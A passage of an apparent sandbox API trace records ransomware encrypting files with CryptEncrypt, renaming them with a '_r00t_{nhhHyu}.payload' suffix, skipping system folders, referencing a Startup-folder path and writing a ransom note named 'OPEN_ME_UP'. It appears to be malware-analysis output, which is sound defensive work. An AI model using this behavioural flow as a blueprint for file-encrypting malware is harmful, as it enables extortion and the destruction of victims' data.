Size=0x2800) returned 0x642a98 [0059.173] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.175] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.175] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.175] GetProcessHeap () returned 0x5e0000 [0059.175] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.175] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.175] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.175] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.175] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.175] CloseHandle (hObject=0x438) returned 1 [0059.178] GetProcessHeap () returned 0x5e0000 [0059.178] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.178] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0059.178] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0059.179] GetProcessHeap () returned 0x5e0000 [0059.179] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.179] FindNextFileW (in: hFindFile=0x606460, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.179] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0059.179] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0059.179] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0059.179] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0059.179] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0059.179] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 49 [0059.179] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0059.179] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.180] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0059.180] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.180] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.180] GetTickCount () returned 0x114f3b8 [0059.180] GetTickCount () returned 0x114f3b8 [0059.180] GetTickCount () returned 0x114f3b8 [0059.180] GetTickCount () returned 0x114f3b8 [0059.180] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.180] GetProcessHeap () returned 0x5e0000 [0059.180] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.180] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.192] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.192] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.192] GetProcessHeap () returned 0x5e0000 [0059.192] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.192] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.192] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.192] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.192] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.192] CloseHandle (hObject=0x438) returned 1 [0059.195] GetProcessHeap () returned 0x5e0000 [0059.195] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.195] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll_r00t_{nhhHyu}.payload") returned 71 [0059.195] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\SetupResources.dll_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll_r00t_{nhhhyu}.payload")) returned 1 [0059.195] GetProcessHeap () returned 0x5e0000 [0059.195] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.195] FindNextFileW (in: hFindFile=0x606460, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0059.195] FindClose (in: hFindFile=0x606460 | out: hFindFile=0x606460) returned 1 [0059.195] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1042\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 62 [0059.195] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1042\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\588bce7c90097ed212\\1042\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0059.196] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0059.197] CloseHandle (hObject=0x430) returned 1 [0059.198] GetProcessHeap () returned 0x5e0000 [0059.198] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60fc68 | out: hHeap=0x5e0000) returned 1 [0059.198] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="1043", cAlternateFileName="")) returned 1 [0059.198] lstrcmpiW (lpString1="1043", lpString2="Windows") returned -1 [0059.198] lstrcmpiW (lpString1="1043", lpString2="$Recycle.bin") returned 1 [0059.198] lstrcmpiW (lpString1="1043", lpString2="System Volume Information") returned -1 [0059.198] lstrcmpiW (lpString1="1043", lpString2="Program Files") returned -1 [0059.198] lstrcmpiW (lpString1="1043", lpString2="Program Files (x86)") returned -1 [0059.198] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043") returned 30 [0059.198] lstrcmpW (lpString1="1043", lpString2=".") returned 1 [0059.198] lstrcmpW (lpString1="1043", lpString2="..") returned 1 [0059.198] lstrcmpW (lpString1="\\\\?\\C:\\588bce7c90097ed212\\1043", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0059.198] GetProcessHeap () returned 0x5e0000 [0059.198] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60fc68 [0059.198] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\*") returned 32 [0059.198] FindFirstFileW (in: lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606160 [0059.198] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0059.198] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0059.198] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0059.198] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0059.198] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0059.198] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\.") returned 32 [0059.198] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0059.198] FindNextFileW (in: hFindFile=0x606160, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0059.199] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0059.199] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0059.199] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0059.199] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0059.199] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0059.199] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\..") returned 33 [0059.199] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0059.199] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0059.199] FindNextFileW (in: hFindFile=0x606160, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xdda, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0059.199] lstrcmpiW (lpString1="eula.rtf", lpString2="Windows") returned -1 [0059.199] lstrcmpiW (lpString1="eula.rtf", lpString2="$Recycle.bin") returned 1 [0059.199] lstrcmpiW (lpString1="eula.rtf", lpString2="System Volume Information") returned -1 [0059.199] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files") returned -1 [0059.199] lstrcmpiW (lpString1="eula.rtf", lpString2="Program Files (x86)") returned -1 [0059.199] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf") returned 39 [0059.199] StrStrIW (lpFirst="eula.rtf", lpSrch=".payload") returned 0x0 [0059.199] lstrcmpW (lpString1="eula.rtf", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.199] lstrcmpW (lpString1="eula.rtf", lpString2="taridd") returned -1 [0059.199] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.199] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.200] GetTickCount () returned 0x114f3c7 [0059.200] GetTickCount () returned 0x114f3c7 [0059.200] GetTickCount () returned 0x114f3c7 [0059.200] GetTickCount () returned 0x114f3c7 [0059.201] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.201] GetProcessHeap () returned 0x5e0000 [0059.201] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.201] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0xdda, lpOverlapped=0x0) returned 1 [0059.202] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xfffff226, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.202] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0xdda, lpOverlapped=0x0) returned 1 [0059.202] GetProcessHeap () returned 0x5e0000 [0059.202] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.202] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.202] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.203] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.203] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.203] CloseHandle (hObject=0x438) returned 1 [0059.204] GetProcessHeap () returned 0x5e0000 [0059.204] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.204] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf_r00t_{nhhHyu}.payload") returned 61 [0059.204] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\eula.rtf_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1043\\eula.rtf_r00t_{nhhhyu}.payload")) returned 1 [0059.206] GetProcessHeap () returned 0x5e0000 [0059.206] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.206] FindNextFileW (in: hFindFile=0x606160, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x13712, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0059.206] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Windows") returned -1 [0059.206] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="$Recycle.bin") returned 1 [0059.206] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="System Volume Information") returned -1 [0059.207] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files") returned -1 [0059.207] lstrcmpiW (lpString1="LocalizedData.xml", lpString2="Program Files (x86)") returned -1 [0059.207] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml") returned 48 [0059.207] StrStrIW (lpFirst="LocalizedData.xml", lpSrch=".payload") returned 0x0 [0059.207] lstrcmpW (lpString1="LocalizedData.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.207] lstrcmpW (lpString1="LocalizedData.xml", lpString2="taridd") returned -1 [0059.207] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.207] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.207] GetTickCount () returned 0x114f3c7 [0059.207] GetTickCount () returned 0x114f415 [0059.298] GetTickCount () returned 0x114f415 [0059.298] GetTickCount () returned 0x114f415 [0059.298] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x2c, dwBufLen=0x80 | out: pbData=0x342f730*, pdwDataLen=0x342f7e0*=0x80) returned 1 [0059.298] GetProcessHeap () returned 0x5e0000 [0059.298] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x2800) returned 0x642a98 [0059.298] ReadFile (in: hFile=0x438, lpBuffer=0x642a98, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesRead=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.300] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.300] WriteFile (in: hFile=0x438, lpBuffer=0x642a98*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x642a98*, lpNumberOfBytesWritten=0x342f7e4*=0x2800, lpOverlapped=0x0) returned 1 [0059.301] GetProcessHeap () returned 0x5e0000 [0059.301] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.301] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.301] WriteFile (in: hFile=0x438, lpBuffer=0x60b450*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x60b450*, lpNumberOfBytesWritten=0x342f7e4*=0x300, lpOverlapped=0x0) returned 1 [0059.301] WriteFile (in: hFile=0x438, lpBuffer=0x342f730*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x342f730*, lpNumberOfBytesWritten=0x342f7e4*=0x80, lpOverlapped=0x0) returned 1 [0059.301] WriteFile (in: hFile=0x438, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x342f7e4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x342f7e4*=0x4, lpOverlapped=0x0) returned 1 [0059.301] CloseHandle (hObject=0x438) returned 1 [0059.304] GetProcessHeap () returned 0x5e0000 [0059.304] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x642a98 [0059.304] wnsprintfW (in: pszDest=0x642a98, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml_r00t_{nhhHyu}.payload") returned 70 [0059.304] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\LocalizedData.xml_r00t_{nhhHyu}.payload" (normalized: "c:\\588bce7c90097ed212\\1043\\localizeddata.xml_r00t_{nhhhyu}.payload")) returned 1 [0059.304] GetProcessHeap () returned 0x5e0000 [0059.304] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x642a98 | out: hHeap=0x5e0000) returned 1 [0059.304] FindNextFileW (in: hFindFile=0x606160, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4b58, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0059.304] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Windows") returned -1 [0059.304] lstrcmpiW (lpString1="SetupResources.dll", lpString2="$Recycle.bin") returned 1 [0059.304] lstrcmpiW (lpString1="SetupResources.dll", lpString2="System Volume Information") returned -1 [0059.304] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files") returned 1 [0059.304] lstrcmpiW (lpString1="SetupResources.dll", lpString2="Program Files (x86)") returned 1 [0059.304] wnsprintfW (in: pszDest=0x60fc68, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll") returned 49 [0059.305] StrStrIW (lpFirst="SetupResources.dll", lpSrch=".payload") returned 0x0 [0059.305] lstrcmpW (lpString1="SetupResources.dll", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0059.305] lstrcmpW (lpString1="SetupResources.dll", lpString2="taridd") returned -1 [0059.305] StrCmpNW (lpStr1="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0059.305] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\1043\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1043\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0059.305] GetTickCount () returned 0x114f425 [0059.305] GetTickCount () returned 0x114f425 [0059.305] GetTickCount () returned 0x114f425 [0059.305] GetTickCount () returned 0x114f425 [0059.306] CryptEncrypt (in: hKey=0x606aa0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x342f730*, 